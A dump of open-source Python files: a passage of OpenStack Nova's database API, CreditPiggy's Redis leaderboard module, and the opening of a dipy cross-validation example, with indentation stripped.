values.pop('metadata'),
set_delete=set_delete)
aggregate.update(values)
aggregate.save(context.session)
return aggregate_get(context, aggregate.id)
else:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
@main_context_manager.writer
def aggregate_delete(context, aggregate_id):
count = _aggregate_get_query(context,
models.Aggregate,
models.Aggregate.id,
aggregate_id).\
soft_delete()
if count == 0:
raise exception.AggregateNotFound(aggregate_id=aggregate_id)
# Delete Metadata
model_query(context, models.AggregateMetadata).\
filter_by(aggregate_id=aggregate_id).\
soft_delete()
@main_context_manager.reader
def aggregate_get_all(context):
return _aggregate_get_query(context, models.Aggregate).all()
def _aggregate_metadata_get_query(context, aggregate_id, read_deleted="yes"):
return model_query(context,
models.AggregateMetadata,
read_deleted=read_deleted).\
filter_by(aggregate_id=aggregate_id)
@require_aggregate_exists
@main_context_manager.reader
def aggregate_metadata_get(context, aggregate_id):
rows = model_query(context,
models.AggregateMetadata).\
filter_by(aggregate_id=aggregate_id).all()
return {r['key']: r['value'] for r in rows}
@require_aggregate_exists
@main_context_manager.writer
def aggregate_metadata_delete(context, aggregate_id, key):
count = _aggregate_get_query(context,
models.AggregateMetadata,
models.AggregateMetadata.aggregate_id,
aggregate_id).\
filter_by(key=key).\
soft_delete()
if count == 0:
raise exception.AggregateMetadataNotFound(aggregate_id=aggregate_id,
metadata_key=key)
@require_aggregate_exists
@main_context_manager.writer
def aggregate_metadata_add(context, aggregate_id, metadata, set_delete=False,
max_retries=10):
all_keys = metadata.keys()
for attempt in range(max_retries):
try:
query = _aggregate_metadata_get_query(context, aggregate_id,
read_deleted='no')
if set_delete:
query.filter(~models.AggregateMetadata.key.in_(all_keys)).\
soft_delete(synchronize_session=False)
already_existing_keys = set()
if all_keys:
query = query.filter(
models.AggregateMetadata.key.in_(all_keys))
for meta_ref in query.all():
key = meta_ref.key
meta_ref.update({"value": metadata[key]})
already_existing_keys.add(key)
new_entries = []
for key, value in metadata.items():
if key in already_existing_keys:
continue
new_entries.append({"key": key,
"value": value,
"aggregate_id": aggregate_id})
if new_entries:
context.session.execute(
models.AggregateMetadata.__table__.insert(),
new_entries)
return metadata
except db_exc.DBDuplicateEntry:
# a concurrent transaction has been committed,
# try again unless this was the last attempt
with excutils.save_and_reraise_exception() as ctxt:
if attempt < max_retries - 1:
ctxt.reraise = False
else:
msg = _("Add metadata failed for aggregate %(id)s after "
"%(retries)s retries") % {"id": aggregate_id,
"retries": max_retries}
LOG.warning(msg)
@require_aggregate_exists
@main_context_manager.reader
def aggregate_host_get_all(context, aggregate_id):
rows = model_query(context,
models.AggregateHost).\
filter_by(aggregate_id=aggregate_id).all()
return [r.host for r in rows]
@require_aggregate_exists
@main_context_manager.writer
def aggregate_host_delete(context, aggregate_id, host):
count = _aggregate_get_query(context,
models.AggregateHost,
models.AggregateHost.aggregate_id,
aggregate_id).\
filter_by(host=host).\
soft_delete()
if count == 0:
raise exception.AggregateHostNotFound(aggregate_id=aggregate_id,
host=host)
@require_aggregate_exists
@main_context_manager.writer
def aggregate_host_add(context, aggregate_id, host):
host_ref = models.AggregateHost()
host_ref.update({"host": host, "aggregate_id": aggregate_id})
try:
host_ref.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.AggregateHostExists(host=host,
aggregate_id=aggregate_id)
return host_ref
################
@pick_context_manager_writer
def instance_fault_create(context, values):
"""Create a new InstanceFault."""
fault_ref = models.InstanceFault()
fault_ref.update(values)
fault_ref.save(context.session)
return dict(fault_ref)
@pick_context_manager_reader
def instance_fault_get_by_instance_uuids(context, instance_uuids):
"""Get all instance faults for the provided instance_uuids."""
if not instance_uuids:
return {}
rows = model_query(context, models.InstanceFault, read_deleted='no').\
filter(models.InstanceFault.instance_uuid.in_(
instance_uuids)).\
order_by(desc("created_at"), desc("id")).\
all()
output = {}
for instance_uuid in instance_uuids:
output[instance_uuid] = []
for row in rows:
data = dict(row)
output[row['instance_uuid']].append(data)
return output
##################
@pick_context_manager_writer
def action_start(context, values):
convert_objects_related_datetimes(values, 'start_time')
action_ref = models.InstanceAction()
action_ref.update(values)
action_ref.save(context.session)
return action_ref
@pick_context_manager_writer
def action_finish(context, values):
convert_objects_related_datetimes(values, 'start_time', 'finish_time')
query = model_query(context, models.InstanceAction).\
filter_by(instance_uuid=values['instance_uuid']).\
filter_by(request_id=values['request_id'])
if query.update(values) != 1:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
return query.one()
@pick_context_manager_reader
def actions_get(context, instance_uuid):
"""Get all instance actions for the provided uuid."""
actions = model_query(context, models.InstanceAction).\
filter_by(instance_uuid=instance_uuid).\
order_by(desc("created_at"), desc("id")).\
all()
return actions
@pick_context_manager_reader
def action_get_by_request_id(context, instance_uuid, request_id):
"""Get the action by request_id and given instance."""
action = _action_get_by_request_id(context, instance_uuid, request_id)
return action
def _action_get_by_request_id(context, instance_uuid, request_id):
result = model_query(context, models.InstanceAction).\
filter_by(instance_uuid=instance_uuid).\
filter_by(request_id=request_id).\
first()
return result
def _action_get_last_created_by_instance_uuid(context, instance_uuid):
result = (model_query(context, models.InstanceAction).
filter_by(instance_uuid=instance_uuid).
order_by(desc("created_at"), desc("id")).
first())
return result
@pick_context_manager_writer
def action_event_start(context, values):
"""Start an event on an instance action."""
convert_objects_related_datetimes(values, 'start_time')
action = _action_get_by_request_id(context, values['instance_uuid'],
values['request_id'])
# When nova-compute restarts, the context is generated again in
# init_host workflow, the request_id was different with the request_id
# recorded in InstanceAction, so we can't get the original record
# according to request_id. Try to get the last created action so that
# init_instance can continue to finish the recovery action, like:
# powering_off, unpausing, and so on.
if not action and not context.project_id:
action = _action_get_last_created_by_instance_uuid(
context, values['instance_uuid'])
if not action:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
values['action_id'] = action['id']
event_ref = models.InstanceActionEvent()
event_ref.update(values)
context.session.add(event_ref)
return event_ref
@pick_context_manager_writer
def action_event_finish(context, values):
"""Finish an event on an instance action."""
convert_objects_related_datetimes(values, 'start_time', 'finish_time')
action = _action_get_by_request_id(context, values['instance_uuid'],
values['request_id'])
# When nova-compute restarts, the context is generated again in
# init_host workflow, the request_id was different with the request_id
# recorded in InstanceAction, so we can't get the original record
# according to request_id. Try to get the last created action so that
# init_instance can continue to finish the recovery action, like:
# powering_off, unpausing, and so on.
if not action and not context.project_id:
action = _action_get_last_created_by_instance_uuid(
context, values['instance_uuid'])
if not action:
raise exception.InstanceActionNotFound(
request_id=values['request_id'],
instance_uuid=values['instance_uuid'])
event_ref = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action['id']).\
filter_by(event=values['event']).\
first()
if not event_ref:
raise exception.InstanceActionEventNotFound(action_id=action['id'],
event=values['event'])
event_ref.update(values)
if values['result'].lower() == 'error':
action.update({'message': 'Error'})
return event_ref
@pick_context_manager_reader
def action_events_get(context, action_id):
events = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action_id).\
order_by(desc("created_at"), desc("id")).\
all()
return events
@pick_context_manager_reader
def action_event_get_by_id(context, action_id, event_id):
event = model_query(context, models.InstanceActionEvent).\
filter_by(action_id=action_id).\
filter_by(id=event_id).\
first()
return event
##################
@require_context
@pick_context_manager_writer
def ec2_instance_create(context, instance_uuid, id=None):
"""Create ec2 compatible instance by provided uuid."""
ec2_instance_ref = models.InstanceIdMapping()
ec2_instance_ref.update({'uuid': instance_uuid})
if id is not None:
ec2_instance_ref.update({'id': id})
ec2_instance_ref.save(context.session)
return ec2_instance_ref
@require_context
@pick_context_manager_reader
def ec2_instance_get_by_uuid(context, instance_uuid):
result = _ec2_instance_get_query(context).\
filter_by(uuid=instance_uuid).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_uuid)
return result
@require_context
@pick_context_manager_reader
def ec2_instance_get_by_id(context, instance_id):
result = _ec2_instance_get_query(context).\
filter_by(id=instance_id).\
first()
if not result:
raise exception.InstanceNotFound(instance_id=instance_id)
return result
@require_context
@pick_context_manager_reader
def get_instance_uuid_by_ec2_id(context, ec2_id):
result = ec2_instance_get_by_id(context, ec2_id)
return result['uuid']
def _ec2_instance_get_query(context):
return model_query(context, models.InstanceIdMapping, read_deleted='yes')
##################
def _task_log_get_query(context, task_name, period_beginning,
period_ending, host=None, state=None):
values = {'period_beginning': period_beginning,
'period_ending': period_ending}
values = convert_objects_related_datetimes(values, *values.keys())
query = model_query(context, models.TaskLog).\
filter_by(task_name=task_name).\
filter_by(period_beginning=values['period_beginning']).\
filter_by(period_ending=values['period_ending'])
if host is not None:
query = query.filter_by(host=host)
if state is not None:
query = query.filter_by(state=state)
return query
@pick_context_manager_reader
def task_log_get(context, task_name, period_beginning, period_ending, host,
state=None):
return _task_log_get_query(context, task_name, period_beginning,
period_ending, host, state).first()
@pick_context_manager_reader
def task_log_get_all(context, task_name, period_beginning, period_ending,
host=None, state=None):
return _task_log_get_query(context, task_name, period_beginning,
period_ending, host, state).all()
@pick_context_manager_writer
def task_log_begin_task(context, task_name, period_beginning, period_ending,
host, task_items=None, message=None):
values = {'period_beginning': period_beginning,
'period_ending': period_ending}
values = convert_objects_related_datetimes(values, *values.keys())
task = models.TaskLog()
task.task_name = task_name
task.period_beginning = values['period_beginning']
task.period_ending = values['period_ending']
task.host = host
task.state = "RUNNING"
if message:
task.message = message
if task_items:
task.task_items = task_items
try:
task.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.TaskAlreadyRunning(task_name=task_name, host=host)
@pick_context_manager_writer
def task_log_end_task(context, task_name, period_beginning, period_ending,
host, errors, message=None):
values = dict(state="DONE", errors=errors)
if message:
values["message"] = message
rows = _task_log_get_query(context, task_name, period_beginning,
period_ending, host).update(values)
if rows == 0:
# It's not running!
raise exception.TaskNotRunning(task_name=task_name, host=host)
##################
def _archive_deleted_rows_for_table(tablename, max_rows):
    """Move up to max_rows rows from one table to the corresponding
    shadow table.
:returns: number of rows archived
"""
# NOTE(guochbo): There is a circular import, nova.db.sqlalchemy.utils
# imports nova.db.sqlalchemy.api.
from nova.db.sqlalchemy import utils as db_utils
engine = get_engine()
conn = engine.connect()
metadata = MetaData()
metadata.bind = engine
# NOTE(tdurakov): table metadata should be received
# from models, not db tables. Default value specified by SoftDeleteMixin
# is known only by models, not DB layer.
# IMPORTANT: please do not change source of metadata information for table.
table = models.BASE.metadata.tables[tablename]
shadow_tablename = _SHADOW_TABLE_PREFIX + tablename
rows_archived = 0
try:
shadow_table = Table(shadow_tablename, metadata, autoload=True)
except NoSuchTableError:
# No corresponding shadow table; skip it.
return rows_archived
if tablename == "dns_domains":
# We have one table (dns_domains) where the key is called
# "domain" rather than "id"
column = table.c.domain
else:
column = table.c.id
# NOTE(guochbo): Use DeleteFromSelect to avoid
# database's limit of maximum parameter in one SQL statement.
deleted_column = table.c.deleted
columns = [c.name for c in table.c]
insert = shadow_table.insert(inline=True).\
from_select(columns,
sql.select([table],
deleted_column != deleted_column.default.arg).
order_by(column).limit(max_rows))
query_delete = sql.select([column],
deleted_column != deleted_column.default.arg).\
order_by(column).limit(max_rows)
delete_statement = db_utils.DeleteFromSelect(table, query_delete, column)
try:
# Group the insert and delete in a transaction.
with conn.begin():
conn.execute(insert)
result_delete = conn.execute(delete_statement)
except db_exc.DBReferenceError as ex:
# A foreign key constraint keeps us from deleting some of
# these rows until we clean up a dependent table. Just
# skip this table for now; we'll come back to it later.
LOG.warning(_LW("IntegrityError detected when archiving table "
"%(tablename)s: %(error)s"),
{'tablename': tablename, 'error': six.text_type(ex)})
return rows_archived
rows_archived = result_delete.rowcount
return rows_archived
def archive_deleted_rows(max_rows=None):
"""Move up to max_rows rows from production tables to the corresponding
shadow tables.
:returns: dict that maps table name to number of rows archived from that
table, for example:
::
{
'instances': 5,
'block_device_mapping': 5,
'pci_devices': 2,
}
"""
table_to_rows_archived = {}
total_rows_archived = 0
meta = MetaData(get_engine(use_slave=True))
meta.reflect()
# Reverse sort the tables so we get the leaf nodes first for processing.
for table in reversed(meta.sorted_tables):
tablename = table.name
# skip the special sqlalchemy-migrate migrate_version table and any
# shadow tables
if (tablename == 'migrate_version' or
tablename.startswith(_SHADOW_TABLE_PREFIX)):
continue
rows_archived = _archive_deleted_rows_for_table(
tablename, max_rows=max_rows - total_rows_archived)
total_rows_archived += rows_archived
# Only report results for tables that had updates.
if rows_archived:
table_to_rows_archived[tablename] = rows_archived
if total_rows_archived >= max_rows:
break
return table_to_rows_archived
@main_context_manager.writer
def pcidevice_online_data_migration(context, max_count):
from nova.objects import pci_device as pci_dev_obj
count_all = 0
count_hit = 0
if not pci_dev_obj.PciDevice.should_migrate_data():
LOG.error(_LE("Data migrations for PciDevice are not safe, likely "
"because not all services that access the DB directly "
"are updated to the latest version"))
else:
results = model_query(context, models.PciDevice).filter_by(
parent_addr=None).limit(max_count)
for db_dict in results:
count_all += 1
pci_dev = pci_dev_obj.PciDevice._from_db_object(
context, pci_dev_obj.PciDevice(), db_dict)
if pci_dev.obj_what_changed():
pci_dev.save()
count_hit += 1
return count_all, count_hit
@main_context_manager.writer
def aggregate_uuids_online_data_migration(context, max_count):
from nova.objects import aggregate
count_all = 0
count_hit = 0
results = model_query(context, models.Aggregate).filter_by(
uuid=None).limit(max_count)
for db_agg in results:
count_all += 1
agg = aggregate.Aggregate._from_db_object(context,
aggregate.Aggregate(),
db_agg)
if 'uuid' in agg:
count_hit += 1
return count_all, count_hit
@main_context_manager.writer
def computenode_uuids_online_data_migration(context, max_count):
from nova.objects import compute_node
count_all = 0
count_hit = 0
results = model_query(context, models.ComputeNode).filter_by(
uuid=None).limit(max_count)
for db_cn in results:
count_all += 1
cn = compute_node.ComputeNode._from_db_object(
context, compute_node.ComputeNode(), db_cn)
if 'uuid' in cn:
count_hit += 1
return count_all, count_hit
####################
def _instance_group_get_query(context, model_class, id_field=None, id=None,
read_deleted=None):
columns_to_join = {models.InstanceGroup: ['_policies', '_members']}
query = model_query(context, model_class, read_deleted=read_deleted,
project_only=True)
for c in columns_to_join.get(model_class, []):
query = query.options(joinedload(c))
if id and id_field:
query = query.filter(id_field == id)
return query
@main_context_manager.writer
def instance_group_create(context, values, policies=None, members=None):
"""Create a new group."""
uuid = values.get('uuid', None)
if uuid is None:
uuid = uuidutils.generate_uuid()
values['uuid'] = uuid
try:
group = models.InstanceGroup()
group.update(values)
group.save(context.session)
except db_exc.DBDuplicateEntry:
raise exception.InstanceGroupIdExists(group_uuid=uuid)
# We don't want '_policies' and '_members' attributes to be lazy loaded
# later. We know there is nothing here since we just created this
# instance group.
if policies:
_instance_group_policies_add(context, group.id, policies)
else:
group._policies = []
if members:
_instance_group_members_add(context, group.id, members)
else:
group._members = []
return instance_group_get(context, uuid)
@main_context_manager.reader
def instance_group_get(context, group_uuid):
"""Get a specific group by uuid."""
group = _instance_group_get_query(context,
models.InstanceGroup,
models.InstanceGroup.uuid,
group_uuid).\
first()
if not group:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
return group
@main_context_manager.reader
def instance_group_get_by_instance(context, instance_uuid):
group_member = model_query(context, models.InstanceGroupMember).\
filter_by(instance_id=instance_uuid).\
first()
if not group_member:
raise exception.InstanceGroupNotFound(group_uuid='')
group = _instance_group_get_query(context, models.InstanceGroup,
models.InstanceGroup.id,
group_member.group_id).first()
if not group:
raise exception.InstanceGroupNotFound(
group_uuid=group_member.group_id)
return group
@main_context_manager.writer
def instance_group_update(context, group_uuid, values):
"""Update the attributes of a group.
If values contains a metadata key, it updates the aggregate metadata
too. Similarly for the policies and members.
"""
group = model_query(context, models.InstanceGroup).\
filter_by(uuid=group_uuid).\
first()
if not group:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
policies = values.get('policies')
if policies is not None:
_instance_group_policies_add(context,
group.id,
values.pop('policies'),
set_delete=True)
members = values.get('members')
if members is not None:
_instance_group_members_add(context,
group.id,
values.pop('members'),
set_delete=True)
group.update(values)
if policies:
values['policies'] = policies
if members:
values['members'] = members
@main_context_manager.writer
def instance_group_delete(context, group_uuid):
"""Delete a group."""
group_id = _instance_group_id(context, group_uuid)
count = _instance_group_get_query(context,
models.InstanceGroup,
models.InstanceGroup.uuid,
group_uuid).soft_delete()
if count == 0:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
# Delete policies, metadata and members
instance_models = [models.InstanceGroupPolicy,
models.InstanceGroupMember]
for model in instance_models:
model_query(context, model).filter_by(group_id=group_id).soft_delete()
@main_context_manager.reader
def instance_group_get_all(context):
"""Get all groups."""
return _instance_group_get_query(context, models.InstanceGroup).all()
@main_context_manager.reader
def instance_group_get_all_by_project_id(context, project_id):
"""Get all groups."""
return _instance_group_get_query(context, models.InstanceGroup).\
filter_by(project_id=project_id).\
all()
def _instance_group_count_by_project_and_user(context, project_id, user_id):
return model_query(context, models.InstanceGroup, read_deleted="no").\
filter_by(project_id=project_id).\
filter_by(user_id=user_id).\
count()
def _instance_group_model_get_query(context, model_class, group_id,
read_deleted='no'):
return model_query(context,
model_class,
read_deleted=read_deleted).\
filter_by(group_id=group_id)
def _instance_group_id(context, group_uuid):
"""Returns the group database ID for the group UUID."""
result = model_query(context,
models.InstanceGroup,
(models.InstanceGroup.id,)).\
filter_by(uuid=group_uuid).\
first()
if not result:
raise exception.InstanceGroupNotFound(group_uuid=group_uuid)
return result.id
def _instance_group_members_add(context, id, members, set_delete=False):
all_members = set(members)
query = _instance_group_model_get_query(context,
models.InstanceGroupMember, id)
if set_delete:
query.filter(~models.InstanceGroupMember.instance_id.in_(
all_members)).\
soft_delete(synchronize_session=False)
query = query.filter(
models.InstanceGroupMember.instance_id.in_(all_members))
already_existing = set()
for member_ref in query.all():
already_existing.add(member_ref.instance_id)
for instance_id in members:
if instance_id in already_existing:
continue
member_ref = models.InstanceGroupMember()
member_ref.update({'instance_id': instance_id,
'group_id': id})
context.session.add(member_ref)
return members
@main_context_manager.writer
def instance_group_members_add(context, group_uuid, members,
set_delete=False):
id = _instance_group_id(context, group_uuid)
return _instance_group_members_add(context, id, members,
set_delete=set_delete)
@main_context_manager.writer
def instance_group_member_delete(context, group_uuid, instance_id):
id = _instance_group_id(context, group_uuid)
count = _instance_group_model_get_query(context,
models.InstanceGroupMember,
id).\
filter_by(instance_id=instance_id).\
soft_delete()
if count == 0:
raise exception.InstanceGroupMemberNotFound(group_uuid=group_uuid,
instance_id=instance_id)
@main_context_manager.reader
def instance_group_members_get(context, group_uuid):
id = _instance_group_id(context, group_uuid)
instances = model_query(context,
models.InstanceGroupMember,
(models.InstanceGroupMember.instance_id,)).\
filter_by(group_id=id).all()
return [instance[0] for instance in instances]
def _instance_group_policies_add(context, id, policies, set_delete=False):
allpols = set(policies)
query = _instance_group_model_get_query(context,
models.InstanceGroupPolicy, id)
if set_delete:
query.filter(~models.InstanceGroupPolicy.policy.in_(allpols)).\
soft_delete(synchronize_session=False)
query = query.filter(models.InstanceGroupPolicy.policy.in_(allpols))
already_existing = set()
for policy_ref in query.all():
already_existing.add(policy_ref.policy)
for policy in policies:
if policy in already_existing:
continue
policy_ref = models.InstanceGroupPolicy()
policy_ref.update({'policy': policy,
'group_id': id})
context.session.add(policy_ref)
return policies
####################
@pick_context_manager_reader
def pci_device_get_by_addr(context, node_id, dev_addr):
pci_dev_ref = model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(address=dev_addr).\
first()
if not pci_dev_ref:
raise exception.PciDeviceNotFound(node_id=node_id, address=dev_addr)
return pci_dev_ref
@pick_context_manager_reader
def pci_device_get_by_id(context, id):
pci_dev_ref = model_query(context, models.PciDevice).\
filter_by(id=id).\
first()
if not pci_dev_ref:
raise exception.PciDeviceNotFoundById(id=id)
return pci_dev_ref
@pick_context_manager_reader
def pci_device_get_all_by_node(context, node_id):
return model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
all()
@pick_context_manager_reader
def pci_device_get_all_by_parent_addr(context, node_id, parent_addr):
return model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(parent_addr=parent_addr).\
all()
@require_context
@pick_context_manager_reader
def pci_device_get_all_by_instance_uuid(context, instance_uuid):
return model_query(context, models.PciDevice).\
filter_by(status='allocated').\
filter_by(instance_uuid=instance_uuid).\
all()
@pick_context_manager_reader
def _instance_pcidevs_get_multi(context, instance_uuids):
if not instance_uuids:
return []
return model_query(context, models.PciDevice).\
filter_by(status='allocated').\
filter(models.PciDevice.instance_uuid.in_(instance_uuids))
@pick_context_manager_writer
def pci_device_destroy(context, node_id, address):
result = model_query(context, models.PciDevice).\
filter_by(compute_node_id=node_id).\
filter_by(address=address).\
soft_delete()
if not result:
raise exception.PciDeviceNotFound(node_id=node_id, address=address)
@pick_context_manager_writer
def pci_device_update(context, node_id, address, values):
query = model_query(context, models.PciDevice, read_deleted="no").\
filter_by(compute_node_id=node_id).\
filter_by(address=address)
if query.update(values) == 0:
device = models.PciDevice()
device.update(values)
context.session.add(device)
return query.one()
####################
@pick_context_manager_writer
def instance_tag_add(context, instance_uuid, tag):
tag_ref = models.Tag()
tag_ref.resource_id = instance_uuid
tag_ref.tag = tag
try:
_check_instance_exists_in_project(context, instance_uuid)
with get_context_manager(context).writer.savepoint.using(context):
context.session.add(tag_ref)
except db_exc.DBDuplicateEntry:
# NOTE(snikitin): We should ignore tags duplicates
pass
return tag_ref
@pick_context_manager_writer
def instance_tag_set(context, instance_uuid, tags):
_check_instance_exists_in_project(context, instance_uuid)
existing = context.session.query(models.Tag.tag).filter_by(
resource_id=instance_uuid).all()
existing = set(row.tag for row in existing)
tags = set(tags)
to_delete = existing - tags
to_add = tags - existing
if to_delete:
context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).filter(
models.Tag.tag.in_(to_delete)).delete(
synchronize_session=False)
if to_add:
data = [
{'resource_id': instance_uuid, 'tag': tag} for tag in to_add]
context.session.execute(models.Tag.__table__.insert(), data)
return context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).all()
@pick_context_manager_reader
def instance_tag_get_by_instance_uuid(context, instance_uuid):
_check_instance_exists_in_project(context, instance_uuid)
return context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).all()
@pick_context_manager_writer
def instance_tag_delete(context, instance_uuid, tag):
_check_instance_exists_in_project(context, instance_uuid)
result = context.session.query(models.Tag).filter_by(
resource_id=instance_uuid, tag=tag).delete()
if not result:
raise exception.InstanceTagNotFound(instance_id=instance_uuid,
tag=tag)
@pick_context_manager_writer
def instance_tag_delete_all(context, instance_uuid):
_check_instance_exists_in_project(context, instance_uuid)
context.session.query(models.Tag).filter_by(
resource_id=instance_uuid).delete()
@main_context_manager.reader
def instance_tag_exists(context, instance_uuid, tag):
_check_instance_exists_in_project(context, instance_uuid)
q = context.session.query(models.Tag).filter_by(
resource_id=instance_uuid, tag=tag)
return context.session.query(q.exists()).scalar()
| apache-2.0 | -8,825,773,516,021,315,000 | 35.131468 | 79 | 0.613147 | false |
wavesoft/creditpiggy | creditpiggy-server/creditpiggy/core/leaderboard.py | 1 | 6519 | ################################################################
# CreditPiggy - Volunteering Computing Credit Bank Project
# Copyright (C) 2015 Ioannis Charalampidis
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
################################################################
import json
import time
import logging
from django.conf import settings
from creditpiggy.core.redis import share_redis_connection
from creditpiggy.core.models import *
"""
from creditpiggy.core.leaderboard import *
from creditpiggy.core.models import *
u = PiggyProject.objects.all()[0]
leaderboard_project(u)
"""
####################################
# Leaderboard functions
####################################
def _objectify_ranking( scores, item_class, item=None ):
"""
Create model objects representing the items in the score list specified
	NOTE: This function requires the enriched version of the scores list, using
the tuple format: (uid, score, rank)
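	Example of the enriched input (illustrative values only):
	scores = [ ("12", 850.0, 1), ("7", 620.5, 2) ]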
"""
# Extract item IDs
uid_score_rank = {}
uid_list = []
for uid, score, rank in scores:
# Skip me from the list
if (item is None) or (int(uid) != item.id):
uid_list.append( uid )
# Update score and rank
uid_score_rank[int(uid)] = (score, rank)
	# Fetch objects of every other item
items = []
for i in item_class.objects.filter(id__in=uid_list):
# Get item object, extended with score and ranking
d = to_dict( i )
(d['score'], d['rank']) = uid_score_rank[i.id]
# None of these is me
d['me'] = False
items.append(d)
# Now add the pivot item in the list
if not item is None:
d = to_dict( item )
(d['score'], d['rank']) = uid_score_rank[item.id]
d['me'] = True
items.append(d)
# Sort by score descending
items.sort( lambda a,b: int(b['score'] * 1000000) - int(a['score'] * 1000000) )
# Return items
return items
def _key_rank_around( key, item, item_class, num_range=100, base=1 ):
"""
Return the neighborhood ranking range under the specified key
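	For example (hypothetical numbers): with num_range=10 and an item at
	zero-based reverse rank 3, n_before clips from 5 to 3 and n_after grows to 6,
	so the returned window covers ranks 0..9 of the board.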
"""
# Get multiple items with pipeline
redis = share_redis_connection()
revrank = redis.zrevrank(
"%s%s" % (settings.REDIS_KEYS_PREFIX, key),
item.id
)
# If missing return None
if revrank is None:
return None
# Get neighborhood bounds
n_before = int(num_range/2)
n_after = num_range - n_before - 1
# Clip upper bound
if (revrank - n_before) < 0:
delta = n_before- revrank
n_before -= delta
n_after += delta
# Get user ranking with score
scores = redis.zrevrange(
"%s%s" % (settings.REDIS_KEYS_PREFIX, key),
revrank - n_before,
revrank + n_after,
withscores=True
)
# Enrich with ranking index
ranks = range( revrank - n_before, revrank + n_after + 1 )
scores = [ scores[i] + (ranks[i] + base,) for i in range(0,len(scores)) ]
# Create objects from the rank IDs
return _objectify_ranking( scores, item_class, item )
def _key_rank_top( key, item_class, num_range=100, base=1 ):
"""
Return the first num_range items from the specified rank-ordered list
"""
# Return a range of items
redis = share_redis_connection()
scores = redis.zrevrange(
"%s%s" % (settings.REDIS_KEYS_PREFIX, key),
0,
num_range - 1,
withscores=True,
)
# If scores is empty or None, return None
if not scores:
return None
# Enrich with ranking index
ranks = range(0, num_range)
scores = [ scores[i] + (ranks[i] + base,) for i in range(0,len(scores)) ]
# Objectify
return _objectify_ranking( scores, item_class )
####################################
# Per entity details
####################################
def leaderboard_user(user, num_range=50, base=1):
"""
Get leaderboard of the specified user
"""
# Return leaderboard neighborhood of users
return _key_rank_around( "rank/users", user, PiggyUser, num_range, base )
def leaderboard_project(project, num_range=50, base=1):
"""
Get leaderboard of the specified project
"""
# Return leaderboard neighborhood of projects
return _key_rank_around( "rank/projects", project, PiggyProject, num_range, base )
def leaderboard_user_campaign(user_campaign, num_range=50, base=1):
"""
Get leaderboard of the specified user's contribution to a campaign
"""
# Return leaderboard neighborhood of projects
return _key_rank_around( "rank/campaign/%i/users" % user_campaign.campaign.id, user_campaign.user, PiggyUser, num_range, base )
def leaderboard_user_project(user_project, num_range=50, base=1):
"""
Get leaderboard of the specified user's contribution to project
"""
# Return leaderboard neighborhood of projects
return _key_rank_around( "rank/project/%i/users" % user_project.project.id, user_project.user, PiggyUser, num_range, base )
####################################
# Overall details
####################################
def leaderboard_users(num_range=100, base=1):
"""
Get leaderboard of top users
"""
# Return leaderboard neighborhood of users
return _key_rank_top( "rank/users", PiggyUser, num_range, base )
def leaderboard_projects(num_range=100, base=1):
"""
Get leaderboard of top projects
"""
# Return leaderboard neighborhood of projects
return _key_rank_top( "rank/projects", PiggyProject, num_range, base )
def leaderboard_users_campaign(campaign, num_range=100, base=1):
"""
Get leaderboard of top user's contribution to a campaign
"""
# Return leaderboard neighborhood of projects
return _key_rank_top( "rank/campaign/%i/users" % campaign.id, PiggyUser, num_range, base )
def leaderboard_users_project(project, num_range=100, base=1):
"""
Get leaderboard of top user's contribution to project
"""
# Return leaderboard neighborhood of projects
return _key_rank_top( "rank/project/%i/users" % project.id, PiggyUser, num_range, base )
####################################
# Merge various leaderboard values
####################################
def merge_leaderboards(leaderboards):
"""
	Merge individual leaderboard results
"""
pass
| gpl-2.0 | 5,628,117,936,112,530,000 | 26.858974 | 128 | 0.663752 | false |
UCL-CS35/incdb-poc | venv/share/doc/dipy/examples/kfold_xval.py | 17 | 5617 | """
============================================
K-fold cross-validation for model comparison
============================================
Different models of diffusion MRI can be compared based on their accuracy in
fitting the diffusion signal. Here, we demonstrate this by comparing two
models: the diffusion tensor model (DTI) and constrained spherical
deconvolution (CSD). These models differ from each other substantially. DTI
approximates the diffusion pattern as a 3D Gaussian distribution, and has only
6 free parameters. CSD, on the other hand, fits many more parameters. The
models are also not nested, so they cannot be compared using the
log-likelihood ratio.
A general way to perform model comparison is cross-validation [Hastie2008]_. In
this method, a model is fit to some of the data (a *learning set*) and the
model is then used to predict a held-out set (a *testing set*). The model
predictions can then be compared to estimate prediction error on the held out
set. This method has been used for comparison of models such as DTI and CSD
[Rokem2014]_, and has the advantage that it the comparison is imprevious to
differences in the number of parameters in the model, and it can be used to
compare models that are not nested.
In `dipy`, we include an implementation of k-fold cross-validation. In this
method, the data is divided into $k$ different segments. In each iteration
$\frac{1}{k}th$ of the data is held out and the model is fit to the other
$\frac{k-1}{k}$ parts of the data. A prediction of the held out data is done
and recorded. At the end of $k$ iterations predictions will have been made for
all of the data, and these can be compared directly to the measured data.
First, we import the modules needed for this example. In particular, the
:mod:`reconst.cross_validation` module implements k-fold cross-validation
"""
import numpy as np
np.random.seed(2014)
import matplotlib.pyplot as plt
import dipy.data as dpd
import dipy.reconst.cross_validation as xval
import dipy.reconst.dti as dti
import dipy.reconst.csdeconv as csd
import scipy.stats as stats
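"""
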